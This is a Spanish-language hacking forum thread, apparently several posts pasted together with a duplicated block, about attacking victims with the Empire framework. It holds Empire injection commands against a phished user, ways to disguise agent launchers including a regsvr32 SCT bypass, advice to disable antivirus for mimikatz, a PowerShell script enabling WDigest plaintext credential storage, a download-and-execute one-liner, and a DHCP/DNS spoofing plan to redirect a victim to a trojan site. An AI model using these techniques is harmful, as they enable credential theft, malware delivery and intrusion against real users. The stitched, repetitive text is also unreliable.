Buenas tardes.

La verdad es que me está costando desobfuscar tu codigo...  No sé porque pero me peta. Seguiré investigando, pero por lo que he leido sobre el obfuscador/s debería sacarme el codigo. Si no tendré que pedir ayuda jeje.

Pista:
¿Es normal que me pete el de4dot?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(Empire: PhishedUserHigh) > psinject initial 392
(Empire: management/psinject) > execute

Inicia el job pero no se inyecta, que podría ser?

Quizá no te injecta porque no tienes permisos de administrador local. ¿Te sale un * como que tienes privilegios de administracion local?

En muchas maneras de "esconder" el .bat o el script que crea el agente.

Te dejo aqui algunas opciones que tienes.

1. Meter el script en un .exe. ¿Como puedes hacer esto?, con muchas aplicaciones, como por ejemplo "iexpress.exe".
2. Usar un exploit el cual sea funcional para la victima, y de payload windows/exec y el script que te crea el empire.
3. Haciendo un bypass con regsvr32 /s /n /u /i:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Dentro del SCT se puede embeber un wscript que lance el powershell.

Con esto lo que te venimos a decir, que hay miles de maneras de hacerlo, sólo, hay que tener imaginación.

Ya que estamos hablando de empire, uno de los payloads es mimikatz. ¿Hay alguien que haya conseguido encodearlo para que haga un bypass con los antivirus?

Yo lo que hago es desactivar el antivirus porque mimikatz es detectable...


Si os gusta el powershell como lenguaje de post explotacion.

Echarle un ojo a este script:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este script es capaz de leer el user y password en texto plano desde la memoria.


Por cierto, para que te funcione debes crear un clave en el reg.

Te dejo un script que me hice para crearla con un bypass:


param(
[string]$Activar="si"

)

$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"}

######################################################################################################################

$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential

######################################################################################################################


if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." }
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key  -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."}

Pues la verdad es que creo que debería haber un foro de powershell. Sobretodo por el alcance que tiene este lenguaje de script orientado a objetos.

En cuanto a la ejecución de scripts en powershell. Hay muchas maneras de realizar un bypass para ejecutar comandos sin tener que ejecutar previamente el comando "Set-ExecutionPolicy Unrestricted".

Como por ejemplo las 2 que más uso:

powershell -nop -c "invoke-expression(New-Object Net.WebClient).DownloadString('http://lawebquea/script.ps1')"
powershell -executionpolicy bypass -file script.ps1

En cuanto al tema de revelar password. Creo que es mejor para la extracción de password mimikittenz

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este script es capaz de leer el user y password en texto plano desde la memoria.


Por cierto, para que te funcione debes crear un clave en el reg.

Te dejo un script que me hice para crearla con un bypass:


param(
[string]$Activar="si"

)

$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"}

######################################################################################################################

$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential

######################################################################################################################


if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." }
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key  -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."}

Bueno, no te explicas muy bien...

Pero creo que lo que intentas hacer, es que visite la página que visite se le redirija a una web que tienes tu creada. Donde habrá un troyano, rat o como lo queramos llamar. En primer lugar lo que yo haría sería intentar realizar un dhcp-spoof desde etthercap.

Básicamente lo que haces enviarle una respuesta dhcp y cambiarle la DNS por la ip de tu máquina. Una vez hecho esto puedes usar DNScheff para realizar la redirección del dominio o dominios que quieras.

Un saludo.

Exploits:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Exploits Routers:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola, quizá deberias dar más informacion. Pero es probable que si estás usando Kali Linux Rolling, tengas el mismo problema que yo he tenido. Te paso como lo solucioné yo.

easy_install -U pip
pip install Twisted==15.5.0

Un saludo.